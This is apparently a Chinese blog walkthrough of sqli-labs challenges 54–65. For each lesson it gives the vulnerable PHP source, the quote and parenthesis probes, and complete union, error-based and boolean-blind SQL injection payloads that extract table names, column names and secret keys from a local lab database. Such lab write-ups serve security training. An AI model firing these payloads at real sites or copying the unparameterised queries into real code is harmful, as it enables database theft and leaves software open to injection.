SQLI-LAB  的 实战记录(Less 54 - Less 65)

  • Less - 54 Challenge-1

    • Test
    • Sourse Code
    • Solution
  • Less - 55 Challenge-2
    • Test
    • Sourse Code
    • Solution
  • Less - 56 Challenge-3
    • Test
    • Sourse Code
    • Solution
  • Less - 57 Challenge-4
    • Test
    • Sourse Code
    • Solution
  • Less - 58 Challenge-5
    • Test
    • Sourse Code
    • Solution
  • Less - 59 Challenge-6
    • Test
    • Sourse Code
    • Solution
  • Less - 60 Challenge-7
    • Test
    • Sourse Code
    • Solution
  • Less - 61 Challenge-8
    • Test
    • Sourse Code
    • Solution
  • Less - 62 Challenge-9
    • Test
    • Sourse Code
    • Solution
  • Less - 63 Challenge-10
    • Test
    • Sourse Code
    • Solution
  • Less - 64 Challenge-11
    • Test
    • Sourse Code
    • Solution
  • Less - 65 Challenge-12
    • Test
    • Sourse Code
    • Solution

以下内容 只是 本人 在做 sqli-lab 练习时 写下的记录,仅供参考。

因为本人学过一些sql注入的内容,所以大部分内容是没有讲解的,如有不清楚的地方,请自行使用搜索引擎查询,相信会得到所需的内容。

Less - 54 Challenge-1

(第54节:挑战 - 1)

Test:

     http://localhost/sqli-lab/Less-54/index.php

The objective of this challenge is to dump the (secret key) from only random table from Database (‘CHALLENGES’) in Less than 10 attempts

注:数据库名:challenges 最多尝试次数:10

     http://localhost/sqli-lab/Less-54/index.php?id=1‘) union select 1,2,3 --+

注:不显示正确信息

     http://localhost/sqli-lab/Less-54/index.php?id=1‘ union select 1,2,3 --+

注:正常,id周围是单引号

Sourse Code:

$sql="SELECT * FROM security.users WHERE id=‘$id‘ LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
    echo ‘Your Login name:‘. $row[‘username‘];
    echo ‘Your Password:‘ .$row[‘password‘];
}else{
     //print_r(mysql_error());
}

Solution:

     http://localhost/sqli-lab/Less-54/index.php?id=0‘ union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=‘challenges‘ --+
          //2x51x9lc2b

     http://localhost/sqli-lab/Less-54/index.php?id=0‘ union select 1,group_concat(column_name),3 from information_schema.columns where table_name=‘2x51x9lc2b‘ --+
          //id,sessid,secret_QD6G,tryy

     http://localhost/sqli-lab/Less-54/index.php?id=0‘ union select 1,group_concat(secret_QD6G),group_concat(sessid) from challenges.2x51x9lc2b --+
          //t5OPJLdkJ60DsyF7T1ZL3rfD
          //140491cdf5b17300fc51147a33ae86bf

注:正则匹配直接暴表名,列名:
     http://localhost/sqli-lab/Less-54/index.php?id=0‘ union select 1,table_name,column_name from information_schema.columns where column_name regexp ‘^secret_[A-Z]{4}$‘ limit 0,1;

Less - 55 Challenge-2

(第55节:挑战 - 2)

Test:

     http://localhost/sqli-lab/Less-55/index.php

The objective of this challenge is to dump the (secret key) from only random table from Database (‘CHALLENGES’) in Less than 14 attempts

注:数据库名:challenges 最多尝试次数:14

     http://localhost/sqli-lab/Less-55/index.php?id=1‘ union select 1,2,3 --+

     http://localhost/sqli-lab/Less-55/index.php?id=1‘) union select 1,2,3 --+

     http://localhost/sqli-lab/Less-55/index.php?id=1" union select 1,2,3 --+

     http://localhost/sqli-lab/Less-55/index.php?id=1") union select 1,2,3 --+

注:不显示正确信息

     http://localhost/sqli-lab/Less-55/index.php?id=1) union select 1,2,3 --+

注:正常,id周围是一层括号

Sourse Code:

$sql="SELECT * FROM security.users WHERE id=($id) LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
     echo ‘Your Login name:‘. $row[‘username‘];
     echo ‘Your Password:‘ .$row[‘password‘];
}else{
     //print_r(mysql_error());
}

Solution:

     http://localhost/sqli-lab/Less-55/index.php?id=0) union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=‘challenges‘ --+
          // tyqb9xz99r

     http://localhost/sqli-lab/Less-55/index.php?id=0) union select 1,group_concat(column_name),3 from information_schema.columns where table_name=‘tyqb9xz99r‘ --+
          // id,sessid,secret_0LLE,tryy

     http://localhost/sqli-lab/Less-55/index.php?id=0) union select 1,group_concat(secret_0LLE),group_concat(sessid) from challenges.tyqb9xz99r --+
          // HvXC6g9NxUeGwZtpfdEYCtUO
          // 486412045b0a355f953e5aa5c8446bcb

Less - 56 Challenge-3

(第56节:挑战 - 3)

Test:

     http://localhost/sqli-lab/Less-56/index.php

The objective of this challenge is to dump the (secret key) from only random table from Database (‘CHALLENGES’) in Less than 14 attempts

注:数据库名:challenges 最多尝试次数:14

     http://localhost/sqli-lab/Less-56/index.php?id=1‘ union select 1,2,3 --+

注:不显示正确信息

     http://localhost/sqli-lab/Less-56/index.php?id=1‘) union select 1,2,3 --+

     http://localhost/sqli-lab/Less-56/index.php?id=1" union select 1,2,3 --+

     http://localhost/sqli-lab/Less-56/index.php?id=1") union select 1,2,3 --+

注:正常,id周围是双引号和一层括号

Sourse Code:

$sql="SELECT * FROM security.users WHERE id=(‘$id‘) LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
     echo ‘Your Login name:‘. $row[‘username‘];
     echo ‘Your Password:‘ .$row[‘password‘];
}else{
     //print_r(mysql_error());
}

Solution:

     http://localhost/sqli-lab/Less-56/index.php?id=0‘) union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=‘challenges‘ --+
          // l1meh6v8xf

     http://localhost/sqli-lab/Less-56/index.php?id=0‘) union select 1,group_concat(column_name),3 from information_schema.columns where table_name=‘l1meh6v8xf‘ --+
          // id,sessid,secret_ZIEU,tryy

     http://localhost/sqli-lab/Less-56/index.php?id=0‘) union select 1,group_concat(secret_ZIEU),group_concat(sessid) from challenges.l1meh6v8xf --+
          //3zjx2Ef32x2clWJlRlS4n2wc
          // 2de68a7c5e3db6a836ab8f5f109416b8

Less - 57 Challenge-4

(第57节:挑战 - 4)

Test:

     http://localhost/sqli-lab/Less-57/index.php

The objective of this challenge is to dump the (secret key) from only random table from Database (‘CHALLENGES’) in Less than 14 attempts

注:数据库名:challenges 最多尝试次数:14

     http://localhost/sqli-lab/Less-57/index.php?id=1") union select 1,2,3 --+

注:不显示正确信息

     http://localhost/sqli-lab/Less-57/index.php?id=1‘ union select 1,2,3 --+

     http://localhost/sqli-lab/Less-57/index.php?id=1‘) union select 1,2,3 --+

     http://localhost/sqli-lab/Less-57/index.php?id=1" union select 1,2,3 --+

注:正常,id周围是双引号

Sourse Code:

$id= ‘"‘.$id.‘"‘;
$sql="SELECT * FROM security.users WHERE id=$id LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
     echo ‘Your Login name:‘. $row[‘username‘];
     echo ‘Your Password:‘ .$row[‘password‘];
}else{
     //print_r(mysql_error());
}

Solution:

     http://localhost/sqli-lab/Less-57/index.php?id=0" union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=‘challenges‘ --+
          // la5spfxomc

     http://localhost/sqli-lab/Less-57/index.php?id=0" union select 1,group_concat(column_name),3 from information_schema.columns where table_name=‘la5spfxomc‘ --+
          // id,sessid,secret_D2E9,tryy

     http://localhost/sqli-lab/Less-57/index.php?id=0" union select 1,group_concat(secret_D2E9),group_concat(sessid) from challenges.la5spfxomc --+
          // AkXpuSMRL2Mjnxbu6ChgdDkI
          // 2c26f9a59b0ba61233e6fc0af8e47f14

Less - 58 Challenge-5

(第58节:挑战 - 5)

Test:

     http://localhost/sqli-lab/Less-58/index.php

The objective of this challenge is to dump the (secret key) from only random table from Database (‘CHALLENGES’) in Less than 5 attempts

注:数据库名:challenges 最多尝试次数:5

     http://localhost/sqli-lab/Less-58/index.php?id=1‘ union select 1,2,3 --+

注:正常

     http://localhost/sqli-lab/Less-58/index.php?id=1‘) union select 1,2,3 --+

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘) union select 1,2,3 – ’ LIMIT 0,1’ at line 1

注:id周围是单引号

Sourse Code:

$sql="SELECT * FROM security.users WHERE id=‘$id‘ LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
     $unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
     $pass = array_reverse($unames);
     echo ‘Your Login name : ‘. $unames[$row[‘id‘]];
     echo ‘Your Password : ‘ .$pass[$row[‘id‘]];
}else{
     print_r(mysql_error());
}

Solution:

     http://localhost/sqli-lab/Less-58/index.php?id=0‘ union select 1,2,3 from (select count(*),concat((select concat(group_concat(table_name) ,0x3a,0x3a,database(),0x3a,0x3a) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
          //qrso3pw6sh::challenges::1

     http://localhost/sqli-lab/Less-58/index.php?id=0‘ union select 1,2,3 from (select count(*),concat((select concat(group_concat(column_name) ,0x3a,0x3a) from information_schema.columns where table_schema=database() and table_name=‘qrso3pw6sh‘ limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
          //id,sessid,secret_MV87,tryy::1

     http://localhost/sqli-lab/Less-58/index.php?id=0‘ union select 1,2,3 from (select count(*),concat((select concat(secret_MV87,0x3a, 0x3a) from challenges.qrso3pw6sh limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
          // 3XJM8hjFz6KNK5aoNUSApgRW::1

Less - 59 Challenge-6

(第59节:挑战 - 6)

Test:

     http://localhost/sqli-lab/Less-59/index.php

The objective of this challenge is to dump the (secret key) from only random table from Database (‘CHALLENGES’) in Less than 5 attempts

注:数据库名:challenges 最多尝试次数:5

     http://localhost/sqli-lab/Less-59/index.php?id=1‘ union select 1,2,3 --+

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ” union select 1,2,3 – LIMIT 0,1’ at line 1

注:id周围没有符号

Sourse Code:

$sql="SELECT * FROM security.users WHERE id=$id LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
     $unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
     $pass = array_reverse($unames);
     echo ‘Your Login name : ‘. $unames[$row[‘id‘]];
     echo ‘Your Password : ‘ .$pass[$row[‘id‘]];
}else{
     print_r(mysql_error());
}

Solution:

     http://localhost/sqli-lab/Less-59/index.php?id=0 union select 1,2,3 from (select count(*),concat((select concat(group_concat(table_name) ,0x3a,0x3a,database(),0x3a,0x3a) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
          // b3ndcj1o8v::challenges::1

     http://localhost/sqli-lab/Less-59/index.php?id=0 union select 1,2,3 from (select count(*),concat((select concat(group_concat(column_name) ,0x3a,0x3a) from information_schema.columns where table_schema=database() and table_name=‘b3ndcj1o8v‘ limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
          //id,sessid,secret_ZWS2,tryy::1

     http://localhost/sqli-lab/Less-59/index.php?id=0 union select 1,2,3 from (select count(*),concat((select concat(secret_ZWS2 ,0x3a, 0x3a) from challenges.b3ndcj1o8v limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
          // zhEVMVgMavK0k92OSv8zmTTm::1

Less - 60 Challenge-7

(第60节:挑战 - 7)

Test:

     http://localhost/sqli-lab/Less-60/index.php

The objective of this challenge is to dump the (secret key) from only random table from Database (‘CHALLENGES’) in Less than 5 attempts

注:数据库名:challenges 最多尝试次数:5

     http://localhost/sqli-lab/Less-60/index.php?id=1" union select 1,2,3 --+

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘union select 1,2,3 – “) LIMIT 0,1’ at line 1

注:id周围是双引号和一层括号

Sourse Code:

$id = ‘("‘.$id.‘")‘;
$sql="SELECT * FROM security.users WHERE id=$id LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
     $unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
     $pass = array_reverse($unames);
     echo ‘Your Login name : ‘. $unames[$row[‘id‘]];
     echo ‘Your Password : ‘ .$pass[$row[‘id‘]];
}else{
     print_r(mysql_error());
}

Solution:

     http://localhost/sqli-lab/Less-60/index.php?id=0") union select 1,2,3 from (select count(*),concat((select concat(group_concat(table_name) ,0x3a,0x3a,database(),0x3a,0x3a) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
          //p9gd2w7p0n::challenges::1

     http://localhost/sqli-lab/Less-60/index.php?id=0") union select 1,2,3 from (select count(*),concat((select concat(group_concat(column_name) ,0x3a,0x3a) from information_schema.columns where table_schema=database() and table_name=‘p9gd2w7p0n‘ limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
          //id,sessid,secret_THZK,tryy::1

     http://localhost/sqli-lab/Less-60/index.php?id=0") union select 1,2,3 from (select count(*),concat((select concat(secret_THZK ,0x3a, 0x3a) from challenges.p9gd2w7p0n limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
          // OSpAsCGlNQ8qbUtTnEXHd0WL::1

Less - 61 Challenge-8

(第61节:挑战 - 8)

Test:

     http://localhost/sqli-lab/Less-61/index.php

The objective of this challenge is to dump the (secret key) from only random table from Database (‘CHALLENGES’) in Less than 5 attempts

注:数据库名:challenges 最多尝试次数:5

     http://localhost/sqli-lab/Less-61/index.php?id=1‘ union select 1,2,3 --+

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘union select 1,2,3 – ‘)) LIMIT 0,1’ at line 1

注:id周围是单引号和两层括号

Sourse Code:

$sql="SELECT * FROM security.users WHERE id=((‘$id‘)) LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
     $unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
     $pass = array_reverse($unames);
     echo ‘Your Login name : ‘. $unames[$row[‘id‘]];
     echo ‘Your Password : ‘ .$pass[$row[‘id‘]];
}else{
     print_r(mysql_error());
}

Solution:

     http://localhost/sqli-lab/Less-61/index.php?id=0‘)) union select 1,2,3 from (select count(*),concat((select concat(group_concat(table_name) ,0x3a,0x3a,database(),0x3a,0x3a) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
          //t44dfrest6::challenges::1

     http://localhost/sqli-lab/Less-61/index.php?id=0‘)) union select 1,2,3 from (select count(*),concat((select concat(group_concat(column_name) ,0x3a,0x3a) from information_schema.columns where table_schema=database() and table_name=‘t44dfrest6‘ limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
          //id,sessid,secret_BN4M,tryy::1

     http://localhost/sqli-lab/Less-61/index.php?id=0‘)) union select 1,2,3 from (select count(*),concat((select concat(secret_BN4M,0x3a, 0x3a) from challenges.t44dfrest6 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
          // dqlfs35mo8ZZlYKFZIvXboSe::1

Less - 62 Challenge-9

(第62节:挑战 - 9)

Test:

     http://localhost/sqli-lab/Less-62/index.php

The objective of this challenge is to dump the (secret key) from only random table from Database (‘CHALLENGES’) in Less than 130 attempts

注:数据库名:challenges 最多尝试次数:130

     http://localhost/sqli-lab/Less-62/index.php?id=1‘ union select 1,2,3 --+

注:不显示正确信息

     http://localhost/sqli-lab/Less-62/index.php?id=1‘) union select 1,2,3 --+

注:正常,id周围是单引号和一层括号

Sourse Code:

$sql="SELECT * FROM security.users WHERE id=(‘$id‘) LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
     $unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
     $pass = array_reverse($unames);
     echo ‘Your Login name : ‘. $unames[$row[‘id‘]];
     echo ‘Your Password : ‘ .$pass[$row[‘id‘]];
}else{
     //print_r(mysql_error());
}

Solution:

     http://localhost/sqli-lab/Less-62/index.php?id=1‘) and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1) ,1,1))) > 97 --+

     http://localhost/sqli-lab/Less-62/index.php?id=1‘) and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1) ,1,1))) > 109 --+

     http://localhost/sqli-lab/Less-62/index.php?id=1‘) and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1) ,1,1))) > 115 --+

     http://localhost/sqli-lab/Less-62/index.php?id=1‘) and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1) ,1,1))) = 119 --+
          //表名 第一个字符:w
          // wlo99z7cua

     http://localhost/sqli-lab/Less-62/index.php?id=1‘) and (ord(substr((select column_name from information_schema.columns limit 2,1),8,1)) %26 16) = 16 --+

     http://localhost/sqli-lab/Less-62/index.php?id=1‘) and (ord(substr((select column_name from information_schema.columns limit 2,1),8,1)) %26 4) = 4 --+

     http://localhost/sqli-lab/Less-62/index.php?id=1‘) and (ord(substr((select column_name from information_schema.columns limit 2,1),8,1)) %26 2) = 2 --+
          //10110 = 22  ,列名中倒数第四个字符:V
          // secret_VUBV

     http://localhost/sqli-lab/Less-62/index.php?id=1‘) and (ascii(substr((select secret_VUBV from wlo99z7cua limit 0,1) ,1,1))) < 64 --+

     http://localhost/sqli-lab/Less-62/index.php?id=1‘) and (ascii(substr((select secret_VUBV from wlo99z7cua limit 0,1) ,1,1))) < 53 --+

     http://localhost/sqli-lab/Less-62/index.php?id=1‘) and (ascii(substr((select secret_VUBV from wlo99z7cua limit 0,1) ,1,1))) < 50 --+

     http://localhost/sqli-lab/Less-62/index.php?id=1‘) and (ord(substr((select secret_VUBV from wlo99z7cua limit 0,1),1,1)) %26 1) = 1 --+
          // key 的 第一个字符:1
          // 1kqTprKdfAt6VGFEoEcpYgjG

注:随机值

表名 10位 由 小写字母和数字 组成

secret_XXXX 后四位由 大写字母和数字 组成

key 24位 由 大小写字母和数字 组成

Less - 63 Challenge-10

(第63节:挑战 - 10)

Test:

     http://localhost/sqli-labess-63/index.php

The objective of this challenge is to dump the (secret key) from only random table from Database (‘CHALLENGES’) in Less than 130 attempts

注:数据库名:challenges 最多尝试次数:130

     http://localhost/sqli-lab/Less-63/index.php?id=1‘) union select 1,2,3 --+

注:不显示正确信息

     http://localhost/sqli-lab/Less-63/index.php?id=1‘ union select 1,2,3 --+

注:正常,id周围是单引号

Sourse Code:

$sql="SELECT * FROM security.users WHERE id=‘$id‘ LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
     $unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
     $pass = array_reverse($unames);
     echo ‘Your Login name : ‘. $unames[$row[‘id‘]];
     echo ‘Your Password : ‘ .$pass[$row[‘id‘]];
}else{
     //print_r(mysql_error());
}

Solution:

     http://localhost/sqli-lab/Less-63/index.php?id=1‘ and (ascii(substr((select secret_8FVY from gelqg5ya7p limit 0,1) ,1,1))) > 64 --+

     http://localhost/sqli-lab/Less-63/index.php?id=1‘ and (ascii(substr((select secret_8FVY from gelqg5ya7p limit 0,1) ,1,1))) < 96 --+

     http://localhost/sqli-lab/Less-63/index.php?id=1‘ and (ascii(substr((select secret_8FVY from gelqg5ya7p limit 0,1) ,1,1))) < 77 --+

     http://localhost/sqli-lab/Less-63/index.php?id=1‘ and (ascii(substr((select secret_8FVY from gelqg5ya7p limit 0,1) ,1,1))) > 70 --+

     http://localhost/sqli-lab/Less-63/index.php?id=1‘ and (ascii(substr((select secret_8FVY from gelqg5ya7p limit 0,1) ,1,1))) < 73 --+

     http://localhost/sqli-lab/Less-63/index.php?id=1‘ and (ord(substr((select secret_8FVY from  gelqg5ya7p limit 0,1),1,1)) %26 1) = 1 --+
          // key 的 第一个字符:G
          //  Gd65kBLDXbCY7wrwRq5jzM4l

Less - 64 Challenge-11

(第64节:挑战 - 11)

Test:

     http://localhost/sqli-lab/Less-64/index.php

The objective of this challenge is to dump the (secret key) from only random table from Database (‘CHALLENGES’) in Less than 130 attempts

注:数据库名:challenges 最多尝试次数:130

     http://localhost/sqli-lab/Less-64/index.php?id=1‘ union select 1,2,3 --+

     http://localhost/sqli-lab/Less-64/index.php?id=1‘) union select 1,2,3 --+

     http://localhost/sqli-lab/Less-64/index.php?id=1" union select 1,2,3 --+

     http://localhost/sqli-lab/Less-64/index.php?id=1") union select 1,2,3 --+

     http://localhost/sqli-lab/Less-64/index.php?id=1) union select 1,2,3 --+

注:不显示正确信息

     http://localhost/sqli-lab/Less-64/index.php?id=1)) union select 1,2,3 --+

注:正常,id周围是两层括号

Sourse Code:

$sql="SELECT * FROM security.users WHERE id=(($id)) LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
     $unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
     $pass = array_reverse($unames);
     echo ‘Your Login name : ‘. $unames[$row[‘id‘]];
     echo ‘Your Password : ‘ .$pass[$row[‘id‘]];
}else{
     //print_r(mysql_error());
}

Solution:

     http://localhost/sqli-lab/Less-64/index.php?id=1)) and (ascii(substr((select secret_S0LE from  tsgl6i8osu limit 0,1) ,1,1))) > 64 --+

     http://localhost/sqli-lab/Less-64/index.php?id=1)) and (ascii(substr((select secret_S0LE from  tsgl6i8osu limit 0,1) ,1,1))) > 97 --+

     http://localhost/sqli-lab/Less-64/index.php?id=1)) and (ascii(substr((select secret_S0LE from tsgl6i8osu limit 0,1) ,1,1))) < 109 --+

     http://localhost/sqli-lab/Less-64/index.php?id=1)) and (ascii(substr((select secret_S0LE from tsgl6i8osu limit 0,1) ,1,1))) < 106 --+

     http://localhost/sqli-lab/Less-64/index.php?id=1)) and (ascii(substr((select secret_S0LE from tsgl6i8osu limit 0,1) ,1,1))) < 104 --+

     http://localhost/sqli-lab/Less-64/index.php?id=1)) and (ascii(substr((select secret_S0LE from tsgl6i8osu limit 0,1) ,1,1))) = 103 --+
          // key 的 第一个字符:g
          //  gpu9QBywZI8jL2M7Uj6DDELa

Less - 65 Challenge-12

(第65节:挑战 - 12)

Test:

     http://localhost/sqli-lab/Less-65/index.php

The objective of this challenge is to dump the (secret key) from only random table from Database (‘CHALLENGES’) in Less than 130 attempts

注:数据库名:challenges 最多尝试次数:130

     http://localhost/sqli-lab/Less-65/index.php?id=1" union select 1,2,3 --+

注:不显示正确信息

     http://localhost/sqli-lab/Less-65/index.php?id=1‘ union select 1,2,3 --+

     http://localhost/sqli-lab/Less-65/index.php?id=1‘) union select 1,2,3 --+

     http://localhost/sqli-lab/Less-65/index.php?id=1") union select 1,2,3 --+

注:正常,id周围是双引号和一层括号

Sourse Code:

$id = ‘"‘.$id.‘"‘;
$sql="SELECT * FROM security.users WHERE id=($id) LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
     $unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
     $pass = array_reverse($unames);
     echo ‘Your Login name : ‘. $unames[$row[‘id‘]];
     echo ‘Your Password : ‘ .$pass[$row[‘id‘]];
}else{
     //print_r(mysql_error());
}

Solution:

     http://localhost/sqli-lab/Less-65/index.php?id=1") and (ascii(substr((select secret_LARH from dfo1zhhb56 limit 0,1) ,1,1))) > 64 --+

     http://localhost/sqli-lab/Less-65/index.php?id=1") and (ascii(substr((select secret_LARH from dfo1zhhb56 limit 0,1) ,1,1))) < 97 --+

     http://localhost/sqli-lab/Less-65/index.php?id=1") and (ascii(substr((select secret_LARH from dfo1zhhb56 limit 0,1) ,1,1))) > 77 --+

     http://localhost/sqli-lab/Less-65/index.php?id=1") and (ascii(substr((select secret_LARH from dfo1zhhb56 limit 0,1) ,1,1))) > 84 --+

     http://localhost/sqli-lab/Less-65/index.php?id=1") and (ascii(substr((select secret_LARH from dfo1zhhb56 limit 0,1) ,1,1))) < 88 --+

     http://localhost/sqli-lab/Less-65/index.php?id=1") and (ascii(substr((select secret_LARH from dfo1zhhb56 limit 0,1) ,1,1))) > 85 --+

     http://localhost/sqli-lab/Less-65/index.php?id=1") and (ascii(substr((select secret_LARH from dfo1zhhb56 limit 0,1) ,1,1))) = 87 --+
          // key 的 第一个字符:W
          // Wa0mYczFC0wFXygjAFaCA1Tb
时间: 2024-08-03 09:43:52

SQLI-LAB  的 实战记录(Less 54 - Less 65)的相关文章

SQL报错注入结合sqli lab和百度杯CTF VId

0x00 背景 学习记录一下报错型的注入,经各方整理和自己总结形成. 所有的注入原理都是一样,即用户输入被拼接执行.但后台数据库执行语句产生错误并回显到页面时即可能存在报错注入. 0x01概念 报错型注入的利用大概有以下3种方式: 1:?id=2' and (select 1 from (select count(*),concat( floor(rand(0)*2),(select (select (查询语句)) from information_schema.tables limit 0,1

云端大数据实战记录-大数据推荐

(转载请注明出处:http://blog.csdn.net/buptgshengod) 1.背景 这是博主第一次大数据实战的经历,之前都是自己写一些算法然后测试很小的数量级.这次是真正接触到TB集的数据,而且完全是在云端处理.下面就把这次的经历简单分享一下. 首先简单介绍一下这次比赛的环境吧: 1.云:采用的是阿里云 2.数据:从四月十五号到八月十五号期间,用户两千多万的购买行为(包括时间,购买.收藏.购物车的次数) 3.工具:阿里提供的xlab(里面有很多算法,随机森林.逻辑回归.knn等).

SQLi Lab的视频教程和文字教程

SQLi Lab 系列的文字和视频(需要翻墙),讲解的很好 SQLi Lab Series - Introduction SQLi Lab Series - Error Based SQLi Lab Series - Double Query / SubQuery SQLi Lab Series - Blind Injection - Boolean Based SQLi Lab Series - Blind Injection - Time Based SQLi Lab Series - Us

Scala 深入浅出实战经典 第54讲:Scala中复合类型实战详解

王家林亲授<DT大数据梦工厂>大数据实战视频 Scala 深入浅出实战经典(1-64讲)完整视频.PPT.代码下载:百度云盘:http://pan.baidu.com/s/1c0noOt6 腾讯微云:http://url.cn/TnGbdC 360云盘:http://yunpan.cn/cQ4c2UALDjSKy 访问密码 45e2土豆:http://www.tudou.com/programs/view/a6qIB7SqOlc/优酷:http://v.youku.com/v_show/id_

sikuli实战记录

1.安装 Win32Util.dll: Can't load 32-bit .dll on a AMD 64 bit platform 需要切换为32位的jre,版本的话,1.7测试没有问题 Getting the VisionProxy.dll: Can not find dependent libraries 推荐安装sikulix,然后设置环境变量,在PATH中添加sikulix的libs目录. 2.开发 click(patten)和click(patten.targetoffset())

云大数据实战记录-大数据推荐

前言 WHY 云:为什么我们须要云.大数据时代我们面对两个问题,一个是大数据的存储.一个是大数据的计算. 由于数据量过大,在单个终端上运行效率过差,所以人们用云来解决这两个问题. WHAT IS 云:云得益于分布式计算的思想.举个简单的样例.运行一千万个数据每一个数据都乘以10并输出,在个人pc上须要大概20分钟.假设是100台电脑做这个工作.可能仅仅用几十秒就能够完毕.云就是我们将复杂的工作通过一定的算法分配给云端的n个server,这样能够大大提高运算效率. How 云:云的实现也就是分步式

kaggle实战记录 =&gt;Digit Recognizer(7月份完全掌握细节及内容)

date:2016-07-11 今天开始注册了kaggle,从digit recognizer开始学习, 由于是第一个案例对于整个流程目前我还不够了解,首先了解大神是怎么运行怎么构思,然后模仿.这样的学习流程可能更加有效,目前看到排名靠前的是用TensorFlow.ps:TensorFlow是可以直接安linux环境下面,但是目前不能在windows环境里面运行(伤心一万点). TensorFlow模块用的是NN(神经网络),既然现在接触到可以用神经网络的例子我再也不好意思再逃避学习神经网络下面

Java 性能优化实战记录(3)--JVM OOM的分析和原因追查

前言: C/C++的程序员渴望Java的自由, Java程序员期许C/C++的约束. 其实那里都是围城, 外面的人想进来, 里面的人想出去. 背景: 作为Java程序员, 除了享受垃圾回收机制带来的便利外, 还深受OOM(Out Of Memory)的困惑和折磨. 本文借鉴了<<深入理解 Java虚拟机>>, 并结合了小编自身的经历和读者一起面对OOM的困局如何分析和破解. 准备工作: 工欲善其事必先利其器, 对java进程的快照分析, 是能够帮助我们迅速的定位出错的原因. 这边我

SSM实战记录(一)--一个大体的分页流程

这是一个使用springMVC+spring+mybatis+bootstrap table做的分页流程,网上之前搜到的类似的教程实在太少了,所以就想着写一个大体的过程(没写的很详细),能帮助到一些人是最好的. 先来一张完成图,可以搜索和按照制定列排序,这些都是操作都是从通过sql搜索出来的. 1.bootstrap table前端设计 对于这种插件,官方例子一般都很详细,遇到不懂得应该去官网查例子,或者翻墙查,反正对百度搜索出来的垃圾不忍直视- 对于表格要注意以下几个问题: 1. 取出来的结果